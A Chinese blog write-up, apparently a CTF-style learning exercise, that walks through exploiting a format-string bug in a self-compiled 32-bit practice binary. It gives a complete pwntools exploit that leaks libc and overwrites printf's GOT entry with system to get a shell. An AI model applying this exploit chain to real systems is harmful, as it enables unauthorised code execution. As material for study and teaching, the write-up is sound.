Pwn 学习 fmt_str_level_1_x86 格式化字符串

已于 2022-09-07 23:00:32 修改
阅读量1.1k 收藏 2
点赞数
分类专栏: Pwn 文章标签: 学习 网络 安全
于 2022-09-07 22:59:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MrTreebook/article/details/126755261
版权
本文详细介绍了fmt_str_level_1_x86程序中的格式化字符串漏洞利用过程,包括checksec分析、源码解读、漏洞剖析、gdb动态调试,以及如何通过payload构造执行shell。涉及了地址泄露、函数指针劫持和Libc版本查找等关键步骤。
摘要由CSDN通过智能技术生成

Pwn 学习 fmt_str_level_1_x86 格式化字符串

1.checksec

在这里插入图片描述

  • 保护全开
  • 这也是格式化字符串常见类型

2.源码

#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
#include<string.h>

int init_func(){
    setvbuf(stdin, 0, 2, 0);
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stderr, 0, 2, 0);
    return 0;
}

int dofunc(){
    char buf[0x100];
    while (1){
        puts("input:");
        read(0, buf, 0x100);
        if( !strncmp(buf, "quit", 4) ){
            break;
        }
        printf(buf);
    }
    return 0;
}

int main(){
    init_func();
    dofunc();
    return 0;
}

3.编译

gcc -m32 -fstack-protector fmt_str_level_1.c -o fmt_str_level_1_x86

4.漏洞分析

在这里插入图片描述

4.1.格式化字符串

  • 可以看到这里有无格式的printf函数
  • 可以利用利用这个函数来实现格式化字符串

4.2.利用过程

第一次泄露

  • 泄露rbp下的main函数返回地址
  • 由此计算main函数的真实地址
  • 通过elf读取静态elf文件,获取静态偏移 main-puts_got
  • 再计算动态puts函数的got表项地址

第二次泄露

  • 使用%s泄露puts函数的真实地址
  • 通过LibcSearcher寻找libc版本
  • 通过libc.dump函数寻找libc中puts函数的地址
  • 再通过puts函数的动态地址减去libc中的puts函数的地址计算的到libc的基地址
  • 通过libc的基地址计算system函数的地址以及bin/sh的地址
  • 通过elf读取静态elf文件计算printf函数的真实地址

第三次泄露

  • 利用pwntools自带的fmtstr_payload构造payload
  • 将printf的真实地址填充到payload中
  • 发送payload
  • 即可获取shell

5.gdb动态调试

5.1.查看格式化字符串偏移

在这里插入图片描述

  • 使用经典调试大法
  • 此时可以看出第7个%p即可泄露栈上的内容

5.2.泄露main函数地址

在这里插入图片描述
在这里插入图片描述

  • 这里已经成功泄露main+41的地址
  • main_addr = main_41 - 41

5.3.计算puts_real_got_addr

main_30 = int(io.recv()[2:10], 16)
main_real_addr = main_30 - 30
offset = elf.symbols['main'] - elf.got['puts']
puts_real_got_addr = main_real_addr - offset - 0xb # 这个0xb是在调试中减去的,可能是因为版本的问题

5.4.泄露puts_real_addr

payload_search_bass = flat([puts_got, b'%7$s\x00'])

5.5.泄露libc版本

libc = LibcSearcher('puts', puts_real_addr)
libc_base_addr = puts_real_addr - libc.dump('puts')
print('libc_base_addr is ', hex(libc_base_addr))
sys_addr = libc_base_addr + libc.dump('system')
print('sys_addr is ', hex(sys_addr))
addr_bin_sh = libc_base_addr + libc.dump('str_bin_sh')

5.6.计算printf函数地址

offset_addr_of_printf = elf.symbols['main'] - elf.got['printf']

printf_real_got_addr = main_real_addr - offset_addr_of_printf -11

5.6.fmtstr_payload构造写got的payload

payload_pwntools_create_set_stack = fmtstr_payload(7, {printf_real_got_addr : sys_addr})

5.7.发送payload即可执行shell

6.exp

from pwn import *
from LibcSearcher import *
# log_level='debug', 

def fmt(prev, word, index):
    fmtstr = ""
    if prev < word:
        result = word - prev
        fmtstr += "%" + str(result) + "c"
    elif prev == word:
        result = 0
    else:
        result = 256 + word -prev
        fmtstr = "%" + str(result) + "c"
    fmtstr += "%" + str(index) + "$hhn"
    return fmtstr.encode('utf-8')

def fmt_str(offset, size, addr, target):
    # offset pianyi
    # size 4 or others
    # addr : write to addr
    # target : content of writing
    payload = b""
    for i in range(4):
        if size == 4:
            payload += p32(addr + i)
        else:
            payload += p64(addr + i)
    prev = len(payload)
    for i in range(4):
        payload += fmt(prev, (target >> i * 8) & 0xff, offset + i)
        prev = (target >> i * 8) & 0xff
    return payload

'''
pwntools工具: fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
第一个参数表示格式化字符串的偏移;
第二个参数表示需要利用&n写入的数据, 采用字典形式,格式目标地址:准备修改的值}
第三个参数表示已经输出的字符个数, 这里没有, 为0, 采用默认值即可;
第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hn写。fmtstr payload函数返回的就是payload
payload = fmtstr payload (offset, { addressl:valuel} )
'''

context(log_level='debug', arch='i386', os='linux')

pwnfile = './fmt_str_level_1_x86'

elf = ELF(pwnfile)

#libc = elf.libc

io = process(pwnfile)

payload_search_main = b'%75$p\x00'

io.recvuntil('input:\n')

io.send(payload_search_main)

main_30 = int(io.recv()[2:10], 16)

main_real_addr = main_30 - 30

offset = elf.symbols['main'] - elf.got['puts']

puts_got = main_real_addr - offset - 0xb

print('puts_got_addr is ',hex(puts_got))

payload_search_bass = flat([puts_got, b'%7$s\x00'])

#gdb.attach(io)

io.send(payload_search_bass)

io.recv(4)

puts_real_addr = u32(io.recv(4))

print('puts_real_addr is ', hex(puts_real_addr))

libc = LibcSearcher('puts', puts_real_addr)

libc_base_addr = puts_real_addr - libc.dump('puts')

print('libc_base_addr is ', hex(libc_base_addr))

sys_addr = libc_base_addr + libc.dump('system')

print('sys_addr is ', hex(sys_addr))

addr_bin_sh = libc_base_addr + libc.dump('str_bin_sh')

print('addr_bin_sh is ', hex(addr_bin_sh))

offset_addr_of_printf = elf.symbols['main'] - elf.got['printf']

printf_real_got_addr = main_real_addr - offset_addr_of_printf -11

# 013-008

print('printf_real_got_addr is:', hex(printf_real_got_addr))

system_addr_str = str(hex(sys_addr))

#system_addr_bytes = system_addr_str.encode('utf-8')

#payload_set_stack = p32(printf_real_got_addr) + p32(printf_real_got_addr + 1) + p32(printf_real_got_addr + 2) + p32(printf_real_got_addr + 3) + b_1 + b_2 + b_3 + b_4
#payload_set_stack = p32(printf_real_got_addr) + b"%" + system_addr_bytes + b"c%7$n\x00"

# payload_set_stack = fmt_str(7, 4, printf_real_got_addr, sys_addr)

payload_pwntools_create_set_stack = fmtstr_payload(7, {printf_real_got_addr : sys_addr})

io.recvuntil('input:\n')

gdb.attach(io)

io.send(payload_pwntools_create_set_stack)

io.interactive()

7.执行exp

在这里插入图片描述

==Microsoft==
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
格式化字符串利器fmtstr_payload | 攻防世界 pwn进阶区 实时数据监测
Kni9hT's Blog
04-21 6596
文章目录0x00.看题0x01.检查保护0x02.利用fmtstr_payload构造payload 0x00.看题 健身回来,继续刷第二题,貌似和上一题一个风格啊。连名字都差不多,偏工业实际。不过这一题学到了一个新东西,fmtstr_payload. 题目描述:小A在对某家医药工厂进行扫描的时候,发现了一个大型实时数据库系统。小A意识到实时数据库系统会采集并存储与工业流程相关的上千节点的数据...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
pwntools中fmtstr的使用
fa1c4的blog
02-01 3968
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
[2020 GeekChallange] Pwn fmt
Nashi_Ko的博客
11-18 626
[2020 GeekChallange] fmt 0x00 格式化字符串漏洞 提示格式化字符串漏洞 简单介绍一下原理: 在写C语言时,不免经常使用printf函数,这个函数有一个很常见的用法: a = 24; printf("%d岁,是学生",a); 输出结果很显然是 24岁,是学生 但是如果出现这么个情况: a = "%p.%p.%p.%p." printf(a) 它就会输出栈的后4个地址。 a = "%4$p" printf(a) 单独输出第四个地址 a = "%4$s" printf(a)
CTF-Wiki pwn fmtstr(格式化字符串漏洞)
mumuzi的博客
07-24 920
https://www.yinxiang.com/everhub/note/f07ff198-5072-4014-b110-21fb833affee –原理 –格式化字符串 –程序崩溃 –泄漏内存 –泄漏栈内存 –泄漏任意地址内存:覆盖小数字、覆盖大数字 –例题1:x64格式化字符串漏洞 –例题2:hijack GOT 劫持GOT表 –例题3:hijack retaddr 劫持返回地址 –盲打 笔记若存在逻辑问题或者原则性问题,恳请在评论区指正,谢谢观看笔记的师傅。之后会出一期萌新常见的问题(主要只是为了自
Pwn·fmt学习笔记
最新发布
qq_22607673的博客
05-26 875
pwn的blind fmt
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
开发者或学习者可以通过分析 "PWN.c" 的源代码了解如何在 AVR 上配置 PWM 定时器,以及如何通过编程控制 PWM 输出。同时,结合 "www.pudn.com.txt" 文件,可以获取项目背景、使用教程或其他相关资源。另外,项目可能...
mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7
09-23
标题中的"mc.zip_package4dr_pwm_pwn发生器_verilog hdl_wayyy7"暗示我们正在讨论一个用Verilog编写的PWM(脉冲宽度调制)信号发生器,其特性包括4位的分辨率,可能是通过4个D触发器(D Flip-flops)来实现的。...
PWM.zip_PWM脉冲发生器_pwn proteus_单片机 pwn_脉冲 仿真_脉冲发生器PWM
09-24
在这个项目中,你可以通过学习和分析提供的C代码,理解如何初始化和操作单片机的定时器来生成PWM信号。同时,利用Proteus的仿真功能,可以直观地看到程序运行的效果,加深对PWM工作原理的理解。这不仅有助于提升你的...
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
在电子设计自动化(EDA)领域,Verilog HDL是一种广泛使用的硬件描述语言,用于描述数字逻辑系统,包括微处理器、接口电路以及各种嵌入式系统。本教程将深入探讨如何利用Verilog HDL实现脉冲宽度调制(PWM)。 **...
python练习—pwn格式化字符串
v_3483608762的博客
07-25 598
[第五空间2019 决赛]PWN5 好长时间没有写博客了,记录一下。 1, printf(&buf)为明显的格式化字符串漏洞 格式化字符串漏洞 可以利用他覆盖掉un_804c044,从而可以执行后门程序。 2第一种方法 使用fmtster——payload函数,简单了当的覆盖掉目标地址。 详情 :fmtster函数 from pwn import * p=process('pwn') # p=remote('node4.buuoj.cn',29440) unk_char=0x0804C044 pa
Pwn 学习 fmt_test_2格式化字符串
MrTreebook的博客
08-21 304
Pwn 学习 fmt_test_2格式化字符串
三个白帽 pwnme - k0 [fmtstr] - [Hijack RetAddr]
ACdream
02-27 1071
程序运行起来功能很简单:输入用户名密码、输出用户名密码、退出 运行起来发现:这里可能会有个缓冲区溢出的漏洞,在输入用户名时可以超过20个,超过的部分成了密码 进一步测试发现,该程序存在fmtstr漏洞 在程序4008A6处提供了system("/bin/sh"),所以我们的思路是,劫持某个函数返回地址到这儿即可 先来计算偏移: 在这里下断 Breakpoi...
[BUUCTF]PWN——axb_2019_fmt64(64位格式化字符串改got表)
mcmuyanga的博客
01-27 2637
axb_2019_fmt64 附件 步骤: 例行检查,64位程序,只开启了nx保护 本地运行看一下,可以一直输入 64位ida打开 跟axb_2019_fmt32差不多,所以还是再次利用格式化字符串漏洞通过%n来写入数据 利用过程 首先找一下偏移,偏移为8 找到偏移后我们就可以泄露libc,计算system和bin/sh了 一开始打算跟fmt32一样来泄露libcpayload = p64(puts_got)+"%08$s",失败了,动调发现被/x00截断了,64位都有这个情况,关于64位格式
Fmtstr_Loop
钞sir的博客
06-23 9789
前言 很多时候都是因为程序中存在循环,如果程序中不存在循环呢?在一些栈溢出中我们可以使用ROP技术劫持函数返回地址到start,同样我们可以使用格式化字符串漏洞做到这一点… 实例 题目:12届信息安全国赛半决赛西南赛区 思路 虽然我们写代码的时候以main函数作为程序入口,但是编译成程序的时候入口并不是main函数,而是start代码段。事实上,start代码段还会调用__libc_start_m...
CTF-pwn pwntools用法探索
dzqxwzoe的博客
02-02 1737
相信各位CTF pwners一定对pwntools熟悉得不能再熟悉,做一道题时写下的第一行代码很可能就是。很多pwners对于pwntools的了解可能仅限于远程交互、ELF文件简单分析这些最基础的功能,但pwntools真的只有这些功能吗?你真的会使用pwntools吗?本文从入手,进行pwntools功能的探索。
[BUUCTF]PWN——judgement_mna_2016(32位fmt
mcmuyanga的博客
03-18 463
judgement_mna_2016 例行检查,32位程序,开启了canary和nx 运行一下,看看大概的情况 32位ida载入 明显的格式化字符串漏洞,动调看一下输入点的位置,找一下flag在栈上的位置,算一下偏移就能够打印出flag 先找一下输入点参数在栈上的位置 可以看到在oxffffcf4c,然后看一下栈上的布局 发现在距离我们输入的数据的偏移为28和32处存放着flag,定位偏移到该处即可 这题根本不用写exp,但为了水长度,贴一下吧 from pwn import * conte
Pwntools使用介绍
AlexYoung28的博客
10-18 7922
pwntools是一个用python编写的CTF pwn题exploit编写工具,目的是为了帮助 使用者更高效便捷地编写exploit。 目前最新稳定版本为3.12.0(2018年5月 )。文档地址:docs.pwntools.com。 一、环境变量设置 Pwntools的许多设置都是通过全局变量context进行控制的,例如系统、架构、字节序等都可以通过如下的方法更改: &gt;&gt;...
[BUUCTF]PWN——xman_2019_format(堆上的fmt+爆破栈)
mcmuyanga的博客
03-22 628
xman_2019_format 例行检查,32位程序,开启了nx 检索程序里的字符串,发现了后门函数,back_doorr=0x80485AB 这题buf并不存储在栈上,而是在malloc申请的堆上 之后buf作为参数,进入到sub_80485C4 由于存在后门函数,可以利用格式化字符串将返回地址改为back_door 这边主要利用了%ac$bn,将长度a的数据写入偏移为b的位置。 格式化字符串漏洞,一般需要先泄露栈地址,然后计算偏移,但是这里没办法这么利用,因为这里的s存放在chunk上,不在
pwn格式化字符串漏洞
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式化字符串漏洞通常发生在使用格式化输出函数(如printf)时,输入的格式字符串中包含了未经验证的用户输入。攻击者可以通过修改格式字符串中的特殊格式标识符来读取或修改内存中的数据。 为了防止格式化字符串漏洞,开发者应该对用户输入进行严格的验证和过滤,确保输入的格式字符串没有恶意的内容。此外,可以使用安全格式化输出函数(如snprintf)来替代不安全的输出函数,以提高代码的安全性。 如果你需要更详细的信息,请告诉我。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

==Microsoft==

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值